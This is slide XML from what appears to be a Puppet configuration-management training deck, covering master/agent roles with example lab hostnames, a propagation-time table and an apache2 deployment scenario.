            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>3. GitHub Repo using clone command</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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0" name="Shape 3620"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3621" name="Google Shape;3621;p584"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="599350"/>
            <a:ext cx="8520600" cy="93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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>What are the Options for Configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Management</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3622" name="Google Shape;3622;p584"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596412" y="2677883"/>
            <a:ext cx="3951174" cy="1337391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3623" name="Google Shape;3623;p584"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6836486" y="2211338"/>
            <a:ext cx="1995814" cy="2353188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3624" name="Google Shape;3624;p584"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367425" y="2285197"/>
            <a:ext cx="2151293" cy="2205478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3628"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3629" name="Google Shape;3629;p585"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8003" l="18026" r="19008" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="212600" y="560925"/>
            <a:ext cx="2548725" cy="4021650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3630" name="Google Shape;3630;p585"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086275" y="727500"/>
            <a:ext cx="5846049" cy="2065600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3631" name="Google Shape;3631;p585"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6765074" y="320575"/>
            <a:ext cx="2111550" cy="601900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3632" name="Google Shape;3632;p585"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201825" y="3227025"/>
            <a:ext cx="6729000" cy="1463700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Puppet is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an efficient system management tool for centralizing and automating the configuration management process</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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6" name="Shape 3636"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3637" name="Google Shape;3637;p586"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7416" l="3040" r="5089" t="4189"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="998950" y="165875"/>
            <a:ext cx="7450775" cy="4811750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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1" name="Shape 3641"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3642" name="Google Shape;3642;p587"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="327025"/>
            <a:ext cx="8520600" cy="45399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2508">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Puppet Master</a:t>
            </a:r>
            <a:endParaRPr sz="2508">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ranu-puppet-server.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500"/>
              <a:t> -&gt; 144.91.98.33:8140</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Puppet Agent</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://ranu-puppet-agent1.dollorinfotech.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://ranu-puppet-agent2.dollorinfotech.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="44000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://ranu-puppet-agent3.dollorinfotech.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="44000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>……. and so on</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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6" name="Shape 3646"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3647" name="Google Shape;3647;p588"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218850" y="12063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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Propagation</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Time</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3648" name="Google Shape;3648;p588"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="2000250"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3619500"/>
                <a:gridCol w="3619500"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2000"/>
                        <a:t>MinTime</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2000"/>
                        <a:t>MaxTime</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="498325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1Sec</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>48 Hr</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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2" name="Shape 3652"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3653" name="Google Shape;3653;p589"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="410575"/>
            <a:ext cx="8520600" cy="41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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Master     =  Anil Dollor (Single Teacher)</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agents    =  All Students (Multiple Students)</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network  =  OKLABS</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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sp>
        <p:nvSpPr>
          <p:cNvPr id="3658" name="Google Shape;3658;p59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520">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learn By Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3520">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3659" name="Google Shape;3659;p590"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488100" y="1291750"/>
            <a:ext cx="8520600" cy="34731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a:t>Suppose we have </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>One masterserver ( PuppetServer )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Many client servers ( say 1000+) ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PuppetAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>All servers (client i.e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>puppetagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) has same environment. For we want to install apache2 on all 1000 servers (Puppet agent)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>So we will create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Puppet configuration file and define the instruction in puppetmaster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3663"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3664" name="Google Shape;3664;p591"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447300" y="233325"/>
            <a:ext cx="8249400" cy="2266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5300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can't</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="5300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> buy actual thousands of server</a:t>
            </a:r>
